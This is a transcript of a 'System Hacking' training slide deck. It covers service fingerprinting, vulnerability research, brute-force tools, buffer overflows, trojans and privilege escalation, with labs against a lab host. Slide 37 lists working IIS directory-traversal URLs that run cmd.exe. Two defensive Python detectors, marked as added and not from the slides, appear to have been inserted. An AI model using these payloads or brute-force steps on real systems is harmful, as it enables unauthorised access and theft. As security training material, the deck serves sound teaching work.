System Hacking - PowerPoint PPT Presentation


    Presentation Transcript
    1. System Hacking Section 4

    2. Outline
    • Service identification
    • Vulnerability identification and research
    • Exploits
    • Putting it all together
    • Target selection in large networks
    • Using automated tools

    3. Service Identification Section 4.1

    4. Service Identification
    • Common ports
    • Banners
    • Fingerprinting

    5. Connecting to ports
    • Telnet or netcat is the best way to connect to ports
    • Many services may be accessed directly

    6. Common ports
    Many services can be identified by their common port numbers

    7. Zone-h.org

    8. Alldas.de

    9. Banners
    Some services may be better identified by banners:
    • telnet on routers (2001, 4001, 6001)
    • Web daemons for applications
    • Compaq Insight Manager
    • Many systems include web configuration interfaces

    10. Banners

    11. Fingerprinting
    Some services cannot be clearly identified just by connecting to them:
    • Netbus on NT uses the same port as an RPC service on Solaris
    • Some database connections do not provide an automatic response
    Fingerprinting a service may identify what it is, even if it has moved ports

    12. Fingerprinting

    13. Vulnerability Research Section 4.2

    14. Vulnerability identification and research
    • This is the process of mapping identified security attributes of a system or application to potential vulnerabilities
    Several methods to map vulnerabilities:
    • Manually map identified systems against publicly available databases such as www.securityfocus.com, www.cert.org and vendor security alerts
    • Use public exploit code posted to various security mailing lists or hacker websites, or write your own code
    • Use automated vulnerability scanning tools such as Nessus, ISS or whisker

    15. Vulnerability research

    16. Lab
    • Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified.
    • www.securityfocus.com
    • General searches on google.com
    • www.packetstormsecurity.com
    • www.astalavista.box.sk
    • www.securiteam.com
    Time: 30 minutes

    17. Exploits Section 4.3

    18. Types of exploits
    • Remote exploits
    • Trojans
    • Privilege escalation

    19. Remote Exploits Section 4.3.1

    20. Remote exploits
    A ‘remote exploit’ attempts to gain access across the network without proper authentication. Examples:
    • Brute force authentication attempts
    • Attacks bypassing integrity checkers
    • Buffer overflows
    • Sniffing (to some extent)

    21. Brute force attacks
    Most common services attacked:
    • Telnet
    • FTP
    • “R” commands
    • Secure Shell
    • SNMP community names
    • Post Office Protocol (POP)
    • HyperText Transfer Protocol (HTTP/HTTPS)
    • SMB

    22. Common Tools used
    • Brutus
    • Admsnmp
    • Admsmb
    • TeeNet
    • Pwscan.pl
    • Thc_hydra

    23. Remote password guessing
    • Attempting to connect to an enumerated share such as ADMIN$ or C$ and trying username/password combinations until one works
    • A “null session” can be established with the target to obtain valid account names
    • Use an automated password guessing tool to brute-force the selected shares.

    24. Brute force attacks under Windows
    Some common services prone to brute force:
    • Web
    • NetBIOS
    • FTP

    25. Legion

    26. Brute force attacks under Unix
    Some common services prone to brute force:
    • telnet
    • SSH
    • Web
    • FTP
    • R-commands

    27. Lab
    • Use a NetBIOS scanning tool to identify local shares on this network
    • Use a brute force tool to attempt access to an account on 10.0.1.120
    • Warning! These tools can produce significant traffic and lock accounts.
    Time: 30 minutes
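As an added defender-side example (not from the slides), a sliding-window detector over constructed login records for the services listed in slides 21 to 27: it raises one alert when a single source accumulates too many failures, and a second when a single account approaches the lockout threshold the lab warns about. The log format, thresholds and window are assumptions.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 60      # look-back window (assumed policy value)
SOURCE_LIMIT = 5         # failures from one source inside the window
LOCKOUT_LIMIT = 3        # failures per account at which a typical lockout policy trips

# Constructed lines "epoch service source account result"; not real traffic.
SAMPLE_LOG = """1000 ssh 10.0.1.77 root FAIL
1005 ssh 10.0.1.77 admin FAIL
1009 ftp 10.0.1.77 anonymous OK
1012 ssh 10.0.1.77 oracle FAIL
1020 smb 10.0.1.77 administrator FAIL
1021 smb 10.0.1.77 administrator FAIL
1022 smb 10.0.1.77 administrator FAIL
1030 ssh 10.0.1.50 alice FAIL
1300 ssh 10.0.1.50 alice OK"""

def parse(log: str):
    # (timestamp, service, source, account, result) per line, oldest first
    events = []
    for line in log.splitlines():
        ts, service, src, account, result = line.split()
        events.append((int(ts), service, src, account, result))
    return sorted(events)

def detect(log: str, window=WINDOW_SECONDS, src_limit=SOURCE_LIMIT, acct_limit=LOCKOUT_LIMIT):
    # Sliding-window failure counters keyed by source (guessing from one host) and
    # by account (the lockout side effect the lab warns about). An alert fires each
    # time the in-window count reaches its limit, as (kind, key, timestamp).
    by_src, by_acct, alerts = defaultdict(deque), defaultdict(deque), []
    for ts, service, src, account, result in parse(log):
        if result != "FAIL":
            continue
        for kind, key, table, limit in (("bruteforce", src, by_src, src_limit),
                                        ("lockout-risk", account, by_acct, acct_limit)):
            q = table[key]
            q.append(ts)
            while ts - q[0] > window:      # drop failures older than the window
                q.popleft()
            if len(q) == limit:
                alerts.append((kind, key, ts))
    return alerts
```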

    28. Buffer overflow attacks
    FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE
    • Stack overflows
    • Format string overflows
    • Heap overflows
    • Overflow subverting the control path

    29. Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE

    30. Buffer overflow attacks
    FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE
    • Occurs when a user or process attempts to place more data into a buffer than was originally allocated
    • Commonly associated with C functions like strcpy(), strcat(), sprintf(), etc.
    • Most frequently found when user input is taken and passed into an application

    31. Windows buffer overflows
    • Only a few conditions have been revealed to date
    • All of them exploited flaws in application programs
    • Very common for DoS attacks
    Exploits:
    • Netmeeting 2.x by Cult of the Dead Cow
    • NT RAS by Cerberus Information Security
    • Winhlp32 by Cerberus Information Security
    • IISHack by eEye
    • Oracle Web Listener 4.0 by CIS
    • Outlook GMT token overrun by Underground Security Systems Research
    • IIS .printer

    32. Unix buffer overflows
    • sadmind
    • FTP
    • SSH
    • NFS

    33. Unexpected input
    • Bypassing integrity checks
    • Gaining access by providing unexpected input
    • IIS unicode
    • Web applications

    34. Format string attacks
    • Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf()
    • Efforts usually focused on SUID root programs

    35. Input validation attacks
    • Occurs when a program fails to recognise syntactically incorrect input
    • Occurs when a module accepts extraneous input
    • Occurs when a module fails to handle missing input fields
    • A field-value correlation error occurs
    • Common in web applications

    36. IIS vulnerabilities
    • Unicode and URL-based attacks
    • Special tags in HTTP
    • Sample scripts to brute force

    37. IIS hacking
    • /scripts/root.exe?/c+dir
    • /MSADC/root.exe?/c+dir
    • /c/winnt/system32/cmd.exe?/c+dir
    • /d/winnt/system32/cmd.exe?/c+dir
    • /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
    • /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    • /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    • /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
    • /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
    • /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
    • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
    • /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
    • /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
    • /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
    • /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
    • /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

    38. Lab
    • Use the provided URLs to roam the filesystem of 10.0.1.120
    • What is accessible and what is not?
    Time: 10 minutes
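The URLs in slides 36 to 38 differ only in how the path separator and the `..` step are encoded (double percent-encoding, overlong UTF-8), so a log check that compares raw strings misses most of them. The following is an added detection example, not part of the slides or of IIS: it canonicalises a request path the way a lax decoder would and flags requests that climb above the web root or name a command executable, run over constructed W3C-style log lines. The lax decoding rule, the suspect-executable list and the log layout are assumptions.

```python
from urllib.parse import unquote_to_bytes
SUSPECT_EXES = {"cmd.exe", "root.exe"}   # executables named in the slide URLs
# Constructed W3C-style lines (client method uri-stem uri-query status); not real traffic.
SAMPLE_LOG = """10.0.1.50 GET /images/logo.gif - 200
10.0.1.77 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
10.0.1.77 GET /MSADC/root.exe /c+dir 200"""

def lenient_utf8(raw: bytes) -> str:
    # Mimic a lax decoder: a 2-byte lead (0xC0-0xDF) is merged with the next byte
    # unchecked, so C0 AF -> '/' and C1 9C / C1 1C -> '\'. Not a full UTF-8 decoder.
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def canonicalize(path: str, max_rounds: int = 3) -> str:
    # Drop the query, percent-decode until stable (%255c and %%35%63 need two
    # rounds to reach '\'), then fold '\' into '/'.
    cur = path.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = lenient_utf8(unquote_to_bytes(cur))
        if decoded == cur:
            break
        cur = decoded
    return cur.replace("\\", "/")

def check_path(path: str):
    # Reason string if the canonical path climbs above the web root or names a command executable, else None
    canon, depth = canonicalize(path), 0
    for seg in canon.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return "escapes web root: " + canon
        elif seg:
            depth += 1
    if canon.rsplit("/", 1)[-1].lower() in SUSPECT_EXES:
        return "command executable requested: " + canon
    return None

def flag_lines(log: str):
    # (client_ip, reason) for every line whose uri-stem (third field) trips check_path
    rows = [line.split() for line in log.splitlines() if line.strip()]
    return [(r[0], check_path(r[2])) for r in rows if len(r) > 2 and check_path(r[2])]
```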

    39. Trojan Horses and Backdoors Section 4.3.2

    40. Windows trojans and backdoors
    These programs provide unauthorised access to a system without the user’s knowledge:
    • Theef
    • CDC BackOrifice
    • SubSeven
    • Moosucker
    A great site: http://www.tlsecurity.net

    41. Tlsecurity.net

    42. Privilege Escalation Section 4.3.3

    43. Privilege escalation
    • Attack used to move from normal user to superuser
    • Quest for Administrator
    • Quest for root

    44. Quest for Administrator
    • Hoovering information
    • Getadmin
    • Sechole
    • Spoofing LPC Port requests

    45. Hoovering information
    • Identify further information that will gain higher privileges
    • Srvinfo
    • Find utility
    • regdmp

    46. Getadmin
    • Windows NT 4
    • Small program written by Konstantin Sobolev
    • Adds users to the local admin group
    • Hijacks a process called winlogon
    • Patched by NT SP3

    47. Sechole
    • Similar functionality to getadmin
    • Modifies instructions in the memory of the OpenProcess API
    • Possible to launch remotely if IIS is running
    • Patched by NT SP6a

    48. Spoofing LPC Port Requests
    • Vulnerability identified by The RAZOR Team at http://razor.bindview.com
    • The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API

    49. Quest for root
    • Local buffer overflow
    • Symlink
    • File Descriptor attacks
    • Signal handling
    • Core-file manipulation
    • Shared libraries
    • Kernel flaws
    • System misconfiguration
    • IFS attacks